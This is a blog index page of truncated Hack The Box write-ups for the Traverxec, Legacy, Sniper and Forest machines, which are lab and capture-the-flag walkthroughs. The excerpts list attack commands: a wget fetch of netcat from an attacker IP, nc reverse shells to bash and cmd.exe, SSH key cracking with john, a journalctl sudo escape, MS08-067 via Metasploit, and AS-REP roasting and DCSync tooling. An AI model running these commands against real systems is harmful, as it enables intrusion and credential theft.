HTB

Hack the box(HTB) Traverxec write up 0 (0)

by
Hack the box(HTB) Traverxec write up
Tweet
Share
Share
Pin
0 Shares

Commands used 1-nmap -sC -sV -O -v -oA initial 10.10.10.42-python getshell.py 10.10.10.165 80 “cd / && mkdir tmp”3-python getshell.py 10.10.10.165 80 “cd /tmp && wget http://10.10.14.20:8000/nc”4-python getshell.py 10.10.10.165 80 “/tmp/nc -e /bin/bash 10.10.14.20 4444″5-cd /home/david/public_www6-base64 backup-ssh-identity-files.tgz7-base64 -d file >>new file8-/usr/share/john/ssh2john.py id_rsa9-john hash –wordlist=/root/Desktop/rockyou.txt10-ssh -i id_rsa [email protected]/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service12-!/bin/bash Steps invloved 1-Enumeration2-Exploiting nostromo 1.9.63-Getting a … Read more

Hack the box(HTB) Legacy writeup 0 (0)

by
Hack the box(HTB) legacy writeup
Tweet
Share
Share
Pin
0 Shares

Its an easy box from hack the box which is very easy and it is more of CVE type. Commands used nmap -sC -sV -O -v -oA initial 10.10.10.4 msfconsole use exploit/windows/smb/ms08_067_netapi show options Steps involved EnumerationFinding exploitUsing metasploit module to exploit it. Enumeration Nmap Scan Increasing send delay for 10.10.10.4 from 0 to 5 … Read more

Hack the box(HTB) Sniper write up 0 (0)

by
Hack the box(HTB) Sniper write up
Tweet
Share
Share
Pin
0 Shares

Steps Nmap scan Finding RFI Setting up Samba server Getting reverse shell Privilege escalation(Getting user.txt) Basic enumeration Making malicious .chm file Getting the reverse shell(Getting root.txt) Commands used nmap -sC -sV -oV 10.10.10.151 nano /etc/samba/smb.conf service smbd start nc.exe 10.10.14.39 4444 -e cmd.exe powershell $username = ‘SNIPER\Chris’ $password = ’36mEAhz/B8xQ~2VM’ $securePassword = ConvertTo-SecureString $password -AsPlainText … Read more

Hackthebox(HTB) Forest Detailed Writeup | walkthrough 0 (0)

by
Forest hack the box writeup
Tweet
Share
Share
Pin
0 Shares

Steps: Nmap Scan. Enumerating user names. Exploiting Kerberos Decryption of hash.txt. Login with Evil-winrm(user) Uploading Blood hound Adding User to group. Escalating the privilages. DCSync attack via secretsdump Login with wmiexec.py(root) Tools used Impacket(GetNPUsers.py,ntlmrelayx.py ,secretsdump.py) Evil-winrm Bloodhound. Commands used nmap -sC -sV -oV 10.10.10.161 enum4linux -a 10.10.10.161 GetNPUsers.py HTB.local/ -usersfile /root/Desktop/htb/forest/user.txt -format john -outputfile hashes.txt … Read more

wpChatIcon